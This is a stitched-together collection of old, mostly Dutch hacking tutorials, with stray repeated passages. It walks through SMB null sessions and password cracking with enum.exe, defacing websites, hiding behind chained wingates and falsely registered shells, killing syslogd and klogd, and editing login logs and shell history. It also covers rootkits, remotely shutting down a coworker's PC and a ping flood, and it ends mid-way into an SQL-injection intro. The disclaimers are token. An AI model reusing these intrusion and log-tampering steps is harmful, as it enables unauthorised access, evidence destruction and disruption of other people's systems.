In deze tut gaan we leren hoe we onze iPod's, iPhones jailbreaken.

Wat je nodig hebt is:

• Een iPad, iPhone of iPod Touch, Firmware 3.1.2, 3.1.3 [iPad 3.2] een van deze.
• Een geactiveerde toestel, eentje die je normaal kan gebruiken en die niet op Recovery mode staat
• Itunes, versie 9+

---

SMB Hacking tutorial(NT/2K/XP)voor n00bs
1. Wat is SMB?
SMB staat voor Server Message Block, deze naam mag je van mij vergeten, je hebt em nergens voor nodig.
SMB is een protocol voor het delen van files, en voor remote administration etc. Deze service draait op port 445.
2. Het hacken van SMB.
----------------------------------------------
Hier nog ff hoop geblaat ivm aangeklaagd worden enzo:
Als je dit gaat doen is het strafbaar ik ben er niet
verantwoordelijk voor, dit staat er alleen voor
educationele doeleinden, op je eigen risico, blabla...
----------------------------------------------
Wat heb je nodig?
een portscanner (die heb je als het goed is al, mocht je die niet hebben: www.google.com>angry ip scanner)
cmd.exe (krijg je gratis bij windows)
een beetje kennis van NET.EXE (net use, net share, enz.)(ook standaard windows progje)
enum.exe (www.google.com > enum.exe)
Je begint met het scannen van een hoopje IP adressen op port 445 (lijkt me logisch) en als je wil ook 5000 (UPNP, betekent meestal windows xp (in ME zit het ook, maar wie heeft dat nou :S ) omdat windows xp standaard wel goed beveiligd is (tegen dit dan)
als je een ip hebt met port 445 open (en het liefst geen 5000) dan doe je start>run cmd.exe
je gaat naar de map waar enum.exe staat (mocht je niet weten hoe dit moet, ga dan snel weg, sportief doen ofzo)
typ eerst maar ff gewoon enum in, kan je ff zien wat je er allemaal mee kan doen..
Je kan eerst ff kijken of het systeem null-sessions toelaat (met een null-session maak je verbinding zonder username of password) door:
NET USE \\hier.komt.het.ip\ipc$ "" /u:"" uit te voeren.
Maar dit is niet nodig.
Wat we meestal willen weten zijn de shares en users, dus vervolgens doen we:
enum -U -S -d hier.komt.het.ip
dan krijg je een hoop geblaat, met usernames en shares, of "return 5, Access denied"
We gaan er ff vanuit dat we gewoon een lijst met users en shares krijgen, bv:
Administrator
Jan met de Pet
Guest
ADMIN$
C$
D$
IPC$
Als je een password list hebt kun je met enum proberen om 1 van de User accounts te kraken, dit doe je zo:
enum -D -f passwordlist.txt -u Administrator hier.weer.het.ip
Als je geluk hebt vind enum een password en kan je de inhoud van de schijven bekijken(bv: net use h: \\hier.weer.het.ip\C$ /u:"Administrator") en veranderen of (als je een scriptkiddie bent) lekker irritant muiscursortjes overnemen enzo.
Als je geen geluk hebt (geen pass gevonden of return 5 gekregen) dan moet je een exploit gaan maken of zoeken.
3. Hoe zorg je dat dit niet bij jou gebeurd?
Je start regedit.exe op, en je gaat naar:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\
Daar verander je de waarde van "restrictanonymous" naar 2 voor win2k en xp, of 1 voor NT.
Verder kan je:
net share C$ C: /DELETE
net share ADMIN$ /DELETE
enz. doen om te zorgen dat dit allemaal niet meer gedeeld is en iemand er dus ook niet makkelijk bij kan.

IP ADRES STRUCTUREN:
Note: De termen "multicast adressen" en "MSB" worden op het einde verklaart
Elk station op een PSN (Packet switched network) dat gebaseerd is op het TCP/IP protocol (Zoals jouw
computer bijvoorbeeld. Ja, we verwijzen naar een computer die verbonden is met het internet) moet een
IP adres hebben, zodat het kan geodentificeerd worden, en informatie kan doorgespeeld worden naar
de verschillende andere computers op het net.
Een ip adres bestaat uit een 32 bit logisch adres. Het adres is verdeeld in twee delen:
1) het netwerk adres:
Toegekend door InterNIC (Internet Network Information Center).
In feite kopen de meeste internet providers een serie nummers om die
dan individueel toe te kennen.
2) Het host adres:
Een adres dat de enkele nodes identificeert (Wat is een NODE?
Een node is eigenlijk een soort tussenstation die gebruikt wordt als de afstand tussen
twee stations te groot is om rechtstreeks met elkaar te kunnen werken.
Het signaal van station 1 wordt dan gestuurd naar de node,
deze stuurt hetzelfde signaal dan weer door naar het volgende station.
Op deze wijze zijn, bij een goed georganiseerd node- netwerk, toch aardige afstanden te overbruggen.)
Het kan toegekend worden door de netwerk manager, door een protocol als DHCP te gebruiken, of
het werkstation zelf.
Het IP netwerk protocol is een logisch gerouteerd protocol, dat betekent dat het adress 192.43.54.2
zal dezelfde fysische draad hebben als 192.43.54.3 (natuurlijk is dit niet altijd zo. Het hangt van het
subnet masker van het netwerk af, maar alles van dat kan nog een text vullen)
IP adres structuur:
---.---.---.---
^ ^
| |
netwerk | host
elke " --- " = 8 bits
De eerste bits ===> netwerk adres
de laatste ==> host adres
Met 8 bits kan he 0-255 representeren. (binair=(2tot de macht 8)-1)
Voorbeeld:
11000010.01011010.00011111.01001010 (binair)
194.90.31.74 (decimaal)
IP adres klassen
We klaseren een IP adres in 5 groepen. Je kan ze bepalen door de "hoge order" (de eerste
4 bit op de linkerzijde van het adres) bits met elkaar te vergelijken:
type | model | target | MSB |addr.range |bit number| max.stations|
| | groups | | |net./hosts| |
------|--------|--------|-----|--------------|----------|-------------|
A |N.h.h.h | ALL | 0 | 1.0.0.0 | 24/7 | 16,777,214 |
| | ACCEPT | | to | | |
| | HUGE | | 127.0.0.0 | | |
| | CORPS | | | | |
-----------------------------------------------------------------------
|N.N.h.h | TO ALL | 10 | 128.1.00 | 16/14 | 65,543 |
B | | LARGE | | to | | |
| | CORPS | | 191.254.00 | | |
-----------------------------------------------------------------------
|N.N.N.h |TO ALOT | 110 | 192.0.1.0 | 8/22 | 254 |
C | |OF | | to | | |
| |SMALL | | 223.225.254 | | |
| |CORPS | | | | |
-----------------------------------------------------------------------
D | NONE |MULTI-CA| 1110| 224.0.0.0 | NOT FOR | UNKNOWN |
| |ST ADDR.| | to | USUAL | |
| |RFC-1112| |239.255.255.255| USE | |
-----------------------------------------------------------------------
E | NOT FOR|EXPERIME|1,1,1,1| 240.0.0.0 |NOT FOR| NOT FOR USE|
| USE |NTAL | | to |USE | |
| |ADDR. | |254.255.255.255| | |
-----------------------------------------------------------------------
Merk het bereik van 127.X.X.X.
Deze adressen zijn toegekend voor intern gebruik van netwerk toestellen, en worden gebruikt als
toepassingen alleen. Bv. 127.0.0.1, het meest gebruikte, is een loopback adres genoemd - alles naar hier
verstuurd komt direct terug naar jou zonder ook maar op een draad te komen.
Ook zijn sommige IP's gereserveerd voor VPNs - Virtual Provate Networks. Deze zijn voor LAN (local
area network) netwerken en WAN (Wide Area network) die het internet protocol gebruiken om te
communiceren, en elke computer in het netwerk een IP toekent. Dus, stel een bepaalde computer
wil een date pakket sturen naar een andere host op het netwerp met het IP 'x', maar er is een andere
computer op het netwerk met hetzelfde IP - wat gebeurt er nu? Daarom kun je deze vorm van IP
niet gebruiken op het internet.
EXTRA:
Verschillende groepen uit elkaar houden:
Je moet de eerste byte van de linkerzijde van het adres als volgt vergelijken:
Type | First byte | MSB
| in decimal |
----------------------------
A | 1-127 | 0
----------------------------
B | 128-191 | 10
----------------------------
C | 192-223 | 110
----------------------------
D | 224-239 | 1110
----------------------------
E | 240-254 | 1111
----------------------------
Vreemde stuff (Newbie nota's):
1) Multicast: (gekopieerd van RFC 1112)
Ip multicasting is het verzenden van een IP datagram naar een "host groepen", een groep
van 0 of meer hosten geodentificeerd door slecht iin IP adres. Een multicast datagram word
aan alle leden van de host groep afgeleverd met de zelfde "best offer"betrouwbaarheid als
een gewoon unicast datagram, ik leg uit, het datagram zal niet met 100% intact bij alle leden
van de groep aankomen, noch in de zelfde orde relatief van andere datagrammen.
De leden van een host groep is dynamisch; dat wil zeggen, verschillende hosts kunnen verbinden
en terug weggaan waneer ze dit willen. Er is geen beperking op de locatie of aantal van de leden
in een groep. Een host mag een lid zijn van meer dan een groep terzelder tijd. Een host moet
geen lid zijn van een groep om er datagrammen naar te sturen.
Een groep mag zowel permanent of niet-permanent zijn. Een permanente groep heeft een, goed gekend,
administratief toegekend IP adres. Het is het adres, niet het lidmaatschap van de groep, dat
permanent is; Op gelijk welk moment mag een permanente groep gelijk welke hoeveelheid leden
hebben, zelfs geen. De IP multicast adressen die niet voorbehouden zijn voor permanente groepen
zijn beschikbaar voor dynamisch niet-permanente groepen die enkel bestaan zolang er leden
zijn.
Internetwerk doorsturen van IP multicast datagrammen (ip packetten) word verwerkt door "multicast
routers" die co-resident, of gescheiden van, een internet gateway zijn. Een host stuurt een IP
multicast datagram als een locaal netwerk multicast die alle onmiddelijk aanliggende leden van
de host groep bereikt. Als het datagram een IP time-to-live (TTL) groter dan 1 heeft nemen de
multicast router(s) verbonden aan het locale netwerk de verantwoordelijkheid om het packet door
te sturen naar alle andere netwerken die leden hebben van de te berieken groep. Op deze andere
leden netwerken die berijkbaar zijn binnen het IP TTL zal een gekoppelde multicast router
de levering vervolledigen door het datagram (ip packet) te leveren als locale multicast.
* Als je het bovenstaande niet verstaat, geen zorgen, het is ingewikkeld en droog maar herlees het
en herlees het neem een woordenboek als het helpt. Hacken is niet gemakkelijk (en ik bedoel niet
het gabber dansje :P)
2) MSB: Most Significent Bit (meest belangerijke bit):
In een reeks nummer is het eerste nummer van links het meest belangrijk omdak het de hoogste waarde
inhoud, als tegengestelde van LSB=> Least Significent Bit (minst ...) wat altijd de kleinste waarde
inhoud.

Steps To Deface A Webpage (About Defacers)  
 
First of all, I do not deface, I never have (besides friends sites as jokes and all in good fun), 
and never will. So how do I know how to deface? I guess I just picked it up on the way, so I am no 
expert in this. If I get a thing or two wrong I apoligize. It is pretty simple when you think that 
defacing is just replacing a file on a computer. Now, finding the exploit in the first place, 
that takes skill, that takes knowledge, that is what real hackers are made of. 
I don't encourage that you deface any sites, as this can be used get credit cards, 
get passwords, get source code, billing info, email databases, etc.. 
(it is only right to put up some kind of warning. now go have fun ;) 
This tutorial will be broken down into 3 main sections, they are as followed: 
1. Finding Vuln Hosts. 
2. Getting In. 
3. Covering Your Tracks 
It really is easy, and I will show you how easy it is moehahaha... 
1. Finding Vuln Hosts 
This section needs to be further broken down into two catigories 
of script kiddies: ones who scan the net for a host that is vuln to 
a certain exploit and ones who search a certain site for any exploit.
The ones you see on alldas are the first kind, they scan thousands of 
sites for a specific exploit. They do not care who they hack, anyone will 
do. They have no set target and not much of a purpose. In my opinion these
 people should either have a cause behind what they are doing, ie.
"I make sure people keep up to date with security, I am a messanger" 
or "I am spreading a political message, I use defacments to get media attention".
People who deface to get famous or to show off their skills need to grow up and 
relize there is a better way of going about this (not that I support the ones 
with other reasons ether). Anyways, the two kinds and what you need to know about them: 
Scanning Script Kiddie: You need to know what signs of the hole are, is it a 
service? A certain OS? A CGI file? How can you tell if they are vuln? What 
version(s) are vuln? You need to know how to search the net to find targets
 which are running whatever is vuln. Use altavista.com or google.com for web
 based exploits. Using a script to scan ip ranges for a certain port that 
runs the vuln service. Or using netcraft.com to find out what kind of server 
they are running and what extras it runs (frontpage, php, etc..) nmap and 
other port scanners allow quick scans of thousands of ips for open ports.
 This is a favorate technique of those guys you see with mass hacks on alldas. 
Targetted Site Script Kiddie: More respectable then the script kiddies who 
hack any old site. The main step here is gathering as much information about 
a site as possible. Find out what OS they run at netcraft or by using: 
telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they 
run by doing a port scan. Find out the specifics on the services by 
telnetting to them. Find any cgi script, or other files which could
 allow access to the server if exploited by checking /cgi /cgi-bin 
and browsing around the site (remember to index browse) 
Wasn't so hard to get the info was it? It may take awhile, but go 
through the site slowly and get all the information you can. 
2. Getting In 
Now that we got the info on the site we can find the exploit(s) we 
can use to get access. If you were a scanning script kiddie you would 
know the exploit ahead of time. A couple of great places to look for 
exploits are Security Focus and packetstorm. Once you get the exploit 
check and make sure that the exploit is for the same version as the 
service, OS, script, etc.. Exploits mainly come in two languages, the 
most used are C and perl. Perl scripts will end in .pl or .cgi, while
 C will end in .c To compile a C file 
(on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 
For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. 
If it is not a script it might be a very simple exploit, or just a theory of a
 possible exploit. Just do alittle research into how to use it. Another thing 
you need to check is weither the exploit is remote or local. If it is local you
 must have an account or physical access to the computer. If it is remote
 you can do it over a network (internet). 
Don't go compiling exploits just yet, there is one more important thing you need to know 
Covering Your Tracks 
So by now you have gotten the info on the host inorder to find an exploit 
that will allow you to get access. So why not do it? The problem with 
covering your tracks isn't that it is hard, rather that it is unpredictable. 
just because you killed the sys logging doesn't mean that they don't have 
another logger or IDS running somewhere else. (even on another box). 
Since most script kiddies don't know the skill of the admin they are 
targetting they have no way of knowing if they have additional loggers 
or what. Instead the script kiddie makes it very hard (next to impossible)
for the admin to track them down. Many use a stolden or second isp account 
to begin with, so even if they get tracked they won't get caught. 
If you don't have the luxery of this then you MUST use multiple wingates, 
shell accounts, or trojans to bounce off of. 
Linking them together will make it very hard for someone to track you down.
Logs on the wingates and shells will most likely be erased after like 2-7 days. 
That is if logs are kept at all. It is hard enough to even get ahold of one 
admin in a week, let alone further tracking the script kiddie down to the next 
wingate or shell and then getting ahold of that admin all before the logs of 
any are erased. And it is rare for an admin to even notice an attack, 
even a smaller percent will actively pursue the attacker at all and will 
just secure their box and forget it ever happend. For the sake of arugment
lets just say if you use wingates and shells, don't do anything to piss the 
admin off too much (which will get them to call authoritizes or try to track
 you down) and you deleting logs you will be safe. So how do you do it? 
We will keep this very short and too the point, so we'll need to get a few wingates.
Wingates by nature tend to change IPs or shutdown all the time, so you need an updated 
list or program to scan the net for them. You can get a list of wingates that is well 
updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program 
called winscan there. Now lets say we have 3 wingates: 
212.96.195.33 port 23 
202.134.244.215 port 1080 
203.87.131.9 port 23 
to use them we go to telnet and connect to them on port 23. 
we should get a responce like this: 
CSM Proxy Server > 
to connect to the next wingate we just type in it's ip:port 
CSM Proxy Server >202.134.244.215:1080 
If you get an error it is most likely to be that the proxy you are
 trying to connect to isn't up, or that you need to login to the proxy. 
If all goes well you will get the 3 chained together and have a shell 
account you are able to connect to. Once you are in your shell account
you can link shells together by: 
[j00@server j00]$ ssh 212.23.53.74

You can get free shells to work with until you get some hacked shells,
here is a list of free shell accounts. And please remember to sign up
with false information and from a wingate if possible. 

SDF (freeshell.org) - http://sdf.lonestar.org 
GREX (cyberspace.org) - http://www.grex.org 
NYX - http://www.nxy.net 
ShellYeah - http://www.shellyeah.org 
HOBBITON.org - http://www.hobbiton.org 
FreeShells - http://www.freeshells.net 
DucTape - http://www.ductape.net 
Free.Net.Pl (Polish server) - http://www.free.net.pl 
XOX.pl (Polish server) - http://www.xox.pl 
IProtection - http://www.iprotection.com 
CORONUS - http://www.coronus.com 
ODD.org - http://www.odd.org 
MARMOSET - http://www.marmoset.net 
flame.org - http://www.flame.org 
freeshells - http://freeshells.net.pk 
LinuxShell - http://www.linuxshell.org 
takiweb - http://www.takiweb.com 
FreePort - http://freeport.xenos.net 
BSDSHELL - http://free.bsdshell.net 
ROOTshell.be - http://www.rootshell.be 
shellasylum.com - http://www.shellasylum.com 
Daforest - http://www.daforest.org 
FreedomShell.com - http://www.freedomshell.com 
LuxAdmin - http://www.luxadmin.org 
shellweb - http://shellweb.net 
blekko - http://blekko.net 

once you get on your last shell you can compile the exploit, 
nd you should be safe from being tracked. But lets be even 
more sure and delete the evidence that we were there. 

Alright, there are a few things on the server side that 
all script kiddies need to be aware of. Mostly these are 
logs that you must delete or edit. The real script kiddies might
 even use a rootkit to automaticly delete the logs.
 Although lets assume you aren't that lame. There are two main 
logging daemons which I will cover, klogd which is the kernel logs,
 and syslogd which is the system logs. First step is to kill the daemons 
so they don't log anymore of your actions. 

[root@hacked root]# ps -def | grep syslogd 
[root@hacked root]# kill -9 pid_of_syslogd 

in the first line we are finding the pid of the syslogd, in the second
 we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd. 

[root@hacked root]# ps -def | grep klogd 
[root@hacked root]# kill -9 pid_of_klogd 

Same thing happening here with klogd as we did with syslogd. 

now that killed the default loggers the script kiddie needs 
to delete themself from the logs. To find where syslogd puts it's logs check the 
/etc/syslog.conf file. Of course if you don't care if the admin knows you were there 
you can delete the logs completely. Lets say you are the lamest of the script kiddies,
a defacer, the admin would know that the box has been comprimised since the website 
was defaced. So there is no point in appending the logs, they would just delete them. 
The reason we are appending them is so that the admin will not even know a break in 
has accurd. I'll go over the main reasons people break into a box: 


To deface the website. - this is really lame, since it has no point and just damages the system. 

To sniff for other network passwords. - there are programs which allow you to sniff other passwords
 sent from and to the box. If this box is on an ethernet network then you can even sniff packets 
(which contain passwords) that are destine to any box in that segment. 

To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you 
comprimised him once you start sending hundreds of MBs through his connection. 

To mount another attack on a box. - this and sniffing is the most commonly used, not lame, 
reason for exploiting something. Since you now how a rootshell you can mount your attack from 
this box instead of those crappy freeshells. And you now have control over the logging of the shell. 

To get sensitive info. - some corperate boxes have alot of valueable info on them.
 Credit card databases, source code for software, user/password lists, and other
 top secret info that a hacker may want to have. 


To learn and have fun. - many people do it for the thrill of hacking, and the
 knowledge you gain. I don't see this as horrible a crime as defacing. as long 
as you don't destroy anything I don't think this is very bad. Infact some people
 will even help the admin patch the hole. Still illegal though, and best not to 
break into anyone's box. 


I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history 
These files are usually in /var/log/ but I have heard of them being in 
/etc/ /usr/bin/ and other places. Since it is different on alot of 
boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. 
and also search threw the /usr/ /var/ and /etc/ directories for other logs.
 Now for the explanation of these 3. 

utmp is the log file for who is on the system, I think you can see why this log 
should be appended. Because you do not want to let anyone know you are in the system.
 wtmp logs the logins and logouts as well as other info you want to keep away from 
the admin. Should be appended to show that you never logged in or out. and lastlog 
is a file which keeps records of all logins. Your shell's history is another file 
that keeps a log of all the commands you issued, you should look for it in your 
$ HOME directory and edit it, .sh_history, .history, and .bash_history are the 
common names. you should only append these log files, not delete them. if you 
delete them it will be like holding a big sign infront of the admin saying 
"You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe.
 I would avoid this unless you are really freaking out. In this case I would suggest that
 you never try to exploit a box again. Another way to find log files is to run a script to
 check for open files (and then manually look at them to determine if they are logs)
 or do a find for files which have been editted, this command would be: find / -ctime 0 -print 

A few popular scripts which can hide your presence from logs include: zap,
 clear and cloak. Zap will replace your presence in the logs with 0's, 
clear will clear the logs of your presence, and cloak will replace your 
presence with different information. acct-cleaner is the only heavily used
 script in deleting account logging from my experience. Most rootkits have 

a log cleaning script, and once you installed it logs are not kept of you 
anyways. If you are on NT the logs are at C:\winNT\system32\LogFiles\, 
just delete them, nt admins most likely don't check them or don't know
 what it means if they are deleted. 

One final thing about covering your tracks, I won't go to into detail 
about this because it would require a tutorial all to itself. I am talking
 about rootkits. What are rootkits? They are a very widely used tool used 
to cover your tracks once you get into a box. They will make staying hidden
 painfree and very easy. What they do is replace the binaries like login, 
ps, and who to not show your presence, ever. They will allow you to login 
without a password, without being logged by wtmp or lastlog and without 
even being in the /etc/passwd file. They also make commands like ps not 
show your processes, so no one knows what programs you are running. They 
send out fake reports on netstat, ls, and w so that everything looks the 
way it normally would, except anything you do is missing. But there are 
some flaws in rootkits, for one some commands produce strange effects 
because the binary was not made correctly. They also leave fingerprints 
(ways to tell that the file is from a rootkit). Only smart/good admins 
check for rootkits, so this isn't the biggest threat, but it should be 
concidered. Rootkits that come with a LKM (loadable kernel module) are 
usually the best as they can pretty much make you totally invisible to 
all others and most admins wouldn't be able to tell they were comprimised. 

In writting this tutorial I have mixed feelings. I do not want more script
 kiddies out their scanning hundreds of sites for the next exploit. And I
 don't want my name on any shouts. I rather would like to have people say
 "mmm, that defacing crap is pretty lame" especially when people with no
 lives scan for exploits everyday just to get their name on a site for a 
few minutes. I feel alot of people are learning everything but what they 
need to know inorder to break into boxes. Maybe this tutorial cut to the 
chase alittle and helps people with some knowledge see how simple it is 
and hopefully make them see that getting into a system is not all it's 
hyped up to be. It is not by any means a full guide, I did not cover alot 
of things. I hope admins found this tutorial helpful aswell, learning that 
no matter what site you run you should always keep on top of the latest
 exploits and patch them. Protect yourself with IDS and try finding holes 
on your own system (both with vuln scanners and by hand). Also setting up 
an external box to log is not a bad idea. Admins should have also seen alittle
 bit into the mind of a script kiddie and learned a few things he does.. 
this should help you catch one if they break into your systems. 

On one final note, defacing is lame. I know many people who have defaced 
in the past and regret it now. You will be labeled a script kiddie and a 
lamer for a long, long time.  

Anyway, hoped you liked this info and sorry for the grammer, me ain't speaking no english:P
Greetz square from Squareware.tk

Deze pagina staat op squareware.tk
 
 

You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible. SDF (freeshell.org) - http://sdf.lonestar.org GREX (cyberspace.org) - http://www.grex.org NYX - http://www.nxy.net ShellYeah - http://www.shellyeah.org HOBBITON.org - http://www.hobbiton.org FreeShells - http://www.freeshells.net DucTape - http://www.ductape.net Free.Net.Pl (Polish server) - http://www.free.net.pl XOX.pl (Polish server) - http://www.xox.pl IProtection - http://www.iprotection.com CORONUS - http://www.coronus.com ODD.org - http://www.odd.org MARMOSET - http://www.marmoset.net flame.org - http://www.flame.org freeshells - http://freeshells.net.pk LinuxShell - http://www.linuxshell.org takiweb - http://www.takiweb.com FreePort - http://freeport.xenos.net BSDSHELL - http://free.bsdshell.net ROOTshell.be - http://www.rootshell.be shellasylum.com - http://www.shellasylum.com Daforest - http://www.daforest.org FreedomShell.com - http://www.freedomshell.com LuxAdmin - http://www.luxadmin.org shellweb - http://shellweb.net blekko - http://blekko.net once you get on your last shell you can compile the exploit, nd you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there. Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anymore of your actions. [root@hacked root]# ps -def | grep syslogd [root@hacked root]# kill -9 pid_of_syslogd in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd. [root@hacked root]# ps -def | grep klogd [root@hacked root]# kill -9 pid_of_klogd Same thing happening here with klogd as we did with syslogd. now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons people break into a box: To deface the website. - this is really lame, since it has no point and just damages the system. To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment. To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hundreds of MBs through his connection. To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell. To get sensitive info. - some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have. To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing. as long as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box. I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3. utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have

a log cleaning script, and once you installed it logs are not kept of you 
anyways. If you are on NT the logs are at C:\winNT\system32\LogFiles\, 
just delete them, nt admins most likely don't check them or don't know
 what it means if they are deleted. 
One final thing about covering your tracks, I won't go to into detail 
about this because it would require a tutorial all to itself. I am talking
 about rootkits. What are rootkits? They are a very widely used tool used 
to cover your tracks once you get into a box. They will make staying hidden
 painfree and very easy. What they do is replace the binaries like login, 
ps, and who to not show your presence, ever. They will allow you to login 
without a password, without being logged by wtmp or lastlog and without 
even being in the /etc/passwd file. They also make commands like ps not 
show your processes, so no one knows what programs you are running. They 
send out fake reports on netstat, ls, and w so that everything looks the 
way it normally would, except anything you do is missing. But there are 
some flaws in rootkits, for one some commands produce strange effects 
because the binary was not made correctly. They also leave fingerprints 
(ways to tell that the file is from a rootkit). Only smart/good admins 
check for rootkits, so this isn't the biggest threat, but it should be 
concidered. Rootkits that come with a LKM (loadable kernel module) are 
usually the best as they can pretty much make you totally invisible to 
all others and most admins wouldn't be able to tell they were comprimised. 
In writting this tutorial I have mixed feelings. I do not want more script
 kiddies out their scanning hundreds of sites for the next exploit. And I
 don't want my name on any shouts. I rather would like to have people say
 "mmm, that defacing crap is pretty lame" especially when people with no
 lives scan for exploits everyday just to get their name on a site for a 
few minutes. I feel alot of people are learning everything but what they 
need to know inorder to break into boxes. Maybe this tutorial cut to the 
chase alittle and helps people with some knowledge see how simple it is 
and hopefully make them see that getting into a system is not all it's 
hyped up to be. It is not by any means a full guide, I did not cover alot 
of things. I hope admins found this tutorial helpful aswell, learning that 
no matter what site you run you should always keep on top of the latest
 exploits and patch them. Protect yourself with IDS and try finding holes 
on your own system (both with vuln scanners and by hand). Also setting up 
an external box to log is not a bad idea. Admins should have also seen alittle
 bit into the mind of a script kiddie and learned a few things he does.. 
this should help you catch one if they break into your systems. 

Als u een netwerk hebt of in een netwerk werkt, dan is het mogelijk om een andere computer uit te schakelen(Bijvoorbeeld van collega's).
Dit doe je met verschillende codes. Je moet echter wel het administrator wachtwoord hebben om dit uit te voeren.

Ga naar Start--->Uitvoeren---> CMD --->hier kun je de codes invoeren.

shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computernaam] [-t xx] [-c "commentaar"] [-d up:xx:yy]


Betekenis:
-i: Opent de interface van het programma.
-|: Afmelden (kan niet gebruikt worden met de -m optie)
-s: Afsluiten
-r: Opnieuw opstarten
-a: Het afsluiten afbreken
-m computernaam: De computer waarop de actie moet worden uitgevoerd
-t xx: De computer met afsluiten in xx seconden
-c "commentaar": Commentaar bij het afsluiten (maximum 127 tekens)
-f: Forceert programma's die nog openstaan tot afsluiten
-d [u][p]:xx:yy: De reden code voor het afsluiten
u: Gebruikerscode
p: Geplande afsluiting
xx: hoofd reden code (moet positief en kleiner zijn dan 256)
yy: tweede reden code (moet positief en kleiner zijn dan 65536)

 

Dus even een voorbeeld:
shutdown -s -m \\Typhierdecomputernaam

Hij sluit nu de computer af van Typhierdecomputernaam die je zal moeten veranderen in de computer naam van je collega's bijvoorbeeld.

 

Veel plezier!!!!!! Door jasperdj

 

 

 

 

 

Ping of death

 

Simple dos attack op sites(ook wel ping of death genoemd)
Het op deze werkt niet altijd doordat sites
beveiligd kunnen zijn of dat je internetverbinding laag is of dat de server
heel veel request kan beantwoorden

Oke open cmd --> en typ dit:

ping Naamvandesitehier -t -l 15000

met die 15000 kun je een beetje kloten want hoe sneller je verbinding is
hoe hoger je die kan en maken en meer kans tot succes kan leiden.
Dus bij een hoge verbindingssnelheid typ dan dit in:

ping Naamvandesitehier -t -l 65510

 

 

 

 

Hacken doe je zo!

Omdat inbreken op computers via e-mail steeds
lastiger wordt, proberen hackers het tegenwoordig
meer en meer via het web door middel van
zogenaamde SQL injection attacks. De auteur
laat zien hoe eenvoudig dergelijke aanvallen
uit te voeren zijn.

Tegenwoordig komen we niet zomaar meer via het
e-mailsysteem binnen op een computer. Dat wil
zeggen dat we geen gekke e-mailtjes meer kunnen
sturen om daarmee in te breken op een computer.
Daarom probeert men het tegenwoordig meer en
meer via het web. Een hiervoor gebruikte
techniek die verbazend eenvoudig is, gaat schuil
achter de illustere naam SQL injection attack.
En deze techniek werkt ook als systeembeheerders
elke security-patch meteen implementeren, de
nieuwste versies van de onderliggende
databasesysteemsoftware hebben, enzovoort.
Dit komt omdat men tegenwoordig niet meer
probeert via lekken in een databasemanagementsysteem
of besturingssysteem binnen te komen, maar via
de voordeur: de webapplicatie zelf.

Wat is er zoal nodig voor een SQL injection
attack? Ten eerste een willekeurige webbrowser.
En ten tweede verstand van gegevensverwerking op
elke universiteit te bekomen. Hier volgt een spoedcursus.

SQL betekent Standard Query Language; het is
een taal waarmee we alles met gegevens kunnen
doen: gegevens creeren, opvragen, manipuleren
en weggooien. Hacken klinkt als een soort
zwarte magie, alleen weggelegd voor diegenen
die de diepste diepten van een computer kunnen
beroeren. Vandaar wat 'hacksuele' voorlichting.
Het woord injection staat voor het zelf inbrengen
van SQL-commando's door gebruik te maken van
een onachtzaam gebouwde webapplicatie.

Een attack uitvoeren
Laten we eens kijken naar de magie van het
inloggen; de realiteit is veel simpeler dan u
durft te vermoeden. Op vrijwel elke website
